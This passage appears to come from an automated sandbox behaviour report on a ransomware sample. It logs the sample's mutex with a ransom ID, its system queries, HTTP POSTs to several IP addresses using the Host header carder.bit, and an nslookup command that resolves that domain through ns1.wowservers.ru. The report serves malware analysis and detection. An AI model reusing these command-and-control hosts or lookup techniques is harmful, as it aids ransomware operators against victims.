Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create - class_name = MyMainWnd, wndproc_parameter = 0 True 1
Fn
Create - class_name = MyMainWnd, wndproc_parameter = 0 True 1
Fn
Set Attribute - index = 0, new_long = 825373492 False 1
Fn
Set Attribute - class_name = MyMainWnd, index = 18446744073709551600, new_long = 1421869056 True 1
Fn
System (37)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = YKYD69Q True 2
Fn
Sleep duration = 200 milliseconds (0.200 seconds) True 1
Fn
Sleep duration = 100 milliseconds (0.100 seconds) True 7
Fn
Sleep duration = 50 milliseconds (0.050 seconds) True 5
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Sleep duration = 10001 milliseconds (10.001 seconds) True 1
Fn
Sleep duration = -1 (infinite) True 1
Fn
Get Time type = System Time, time = 2018-05-29 01:42:04 (UTC) True 1
Fn
Get Time type = System Time, time = 2018-05-29 01:42:05 (UTC) True 1
Fn
Get Time type = Ticks, time = 241177 True 1
Fn
Get Time type = Ticks, time = 273890 True 1
Fn
Get Time type = Ticks, time = 280208 True 1
Fn
Get Time type = Ticks, time = 306432 True 2
Fn
Get Time type = Ticks, time = 311190 True 1
Fn
Get Time type = Ticks, time = 312782 True 1
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 5
Fn
Get Info type = Hardware Information True 2
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=8a13d26b705ba84c True 1
Fn
Environment (3)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Get Environment String name = AppData, result_out = C:\Users\aETAdzjz\AppData\Roaming True 1
Fn
Network Behavior
HTTP Sessions (5)
»
Information Value
Total Data Sent 1.21 KB
Total Data Received 1.01 KB
Contacted Host Count 4
Contacted Hosts ipv4bot.whatismyipaddress.com, 109.175.6.103, 41.74.170.134, 46.238.18.157
HTTP Session #1
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 255
Data Received 14
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Read Response size = 10238, size_out = 14 True 1
Fn
Data
Read Response size = 10238, size_out = 0 True 1
Fn
Close Session - True 10
Fn
HTTP Session #2
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name 109.175.6.103
Server Port 80
Data Sent 238
Data Received 455
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 109.175.6.103, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = loowgeai?de=gh, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 109.175.6.103/loowgeai?de=gh True 1
Fn
Data
Read Response size = 204798, size_out = 455 True 1
Fn
Data
Read Response size = 204798, size_out = 0 True 1
Fn
Close Session - True 10
Fn
HTTP Session #3
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 255
Data Received 14
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Read Response size = 10238, size_out = 14 True 1
Fn
Data
Read Response size = 10238, size_out = 0 True 1
Fn
Close Session - True 10
Fn
HTTP Session #4
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name 41.74.170.134
Server Port 80
Data Sent 253
Data Received 552
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 41.74.170.134, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = eigeeyde?ielo=deei&ghoa=ghauf, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 41.74.170.134/eigeeyde?ielo=deei&ghoa=ghauf True 1
Fn
Data
Read Response size = 204798, size_out = 552 True 1
Fn
Data
Read Response size = 204798, size_out = 0 True 1
Fn
Close Session - True 10
Fn
HTTP Session #5
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name 46.238.18.157
Server Port 80
Data Sent 243
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 46.238.18.157, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = orestau?erde=looade, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 46.238.18.157/orestau?erde=looade True 1
Fn
Data
Read Response size = 204798, size_out = 0 True 1
Fn
Close Session - True 10
Fn
Process #4: nslookup.exe
10 16
»
Information Value
ID #4
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:03:42, Reason: Child Process
Unmonitor End Time: 00:04:55, Reason: Terminated by Timeout
Monitor Duration 00:01:13
OS Process Information
»
Information Value
PID 0x424
Parent PID 0x870 (c:\users\public\rt0fv0ph.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 124
0x 648
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False -
pagefile_0x00000000000b0000 0x000b0000 0x000b1fff Pagefile Backed Memory Readable, Writable True False False -
nslookup.exe.mui 0x000c0000 0x000c4fff Memory Mapped File Readable, Writable False False False -
private_0x00000000000d0000 0x000d0000 0x0010ffff Private Memory Readable, Writable True False False -
locale.nls 0x00110000 0x00176fff Memory Mapped File Readable False False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False -
private_0x0000000000190000 0x00190000 0x00190fff Private Memory Readable, Writable True False False -
private_0x0000000000220000 0x00220000 0x0022ffff Private Memory Readable, Writable True False False -
private_0x00000000002b0000 0x002b0000 0x0032ffff Private Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x003effff Private Memory Readable, Writable True False False -
nslookup.exe 0x00400000 0x0041dfff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000420000 0x00420000 0x005a7fff Pagefile Backed Memory Readable True False False -
private_0x00000000005c0000 0x005c0000 0x006bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000006c0000 0x006c0000 0x00840fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000850000 0x00850000 0x01c4ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001c50000 0x01c50000 0x01d3ffff Private Memory Readable, Writable True False False -
private_0x0000000001c70000 0x01c70000 0x01caffff Private Memory Readable, Writable True False False -
private_0x0000000001cf0000 0x01cf0000 0x01d2ffff Private Memory Readable, Writable True False False -
private_0x0000000001d30000 0x01d30000 0x01d3ffff Private Memory Readable, Writable True False False -
private_0x0000000001de0000 0x01de0000 0x01e1ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01e20000 0x020eefff Memory Mapped File Readable False False False -
private_0x00000000020f0000 0x020f0000 0x0231ffff Private Memory Readable, Writable True False False -
private_0x00000000020f0000 0x020f0000 0x021effff Private Memory Readable, Writable True False False -
private_0x00000000022e0000 0x022e0000 0x0231ffff Private Memory Readable, Writable True False False -
wsock32.dll 0x743e0000 0x743e6fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74630000 0x74667fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x74670000 0x74675fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x74680000 0x74684fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x74690000 0x74697fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x746a0000 0x746dbfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x746e0000 0x746f1fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x74700000 0x7470ffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x74710000 0x74715fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x74a40000 0x74a4ffff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a90000 0x74a96fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74aa0000 0x74abbfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74ac0000 0x74b03fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
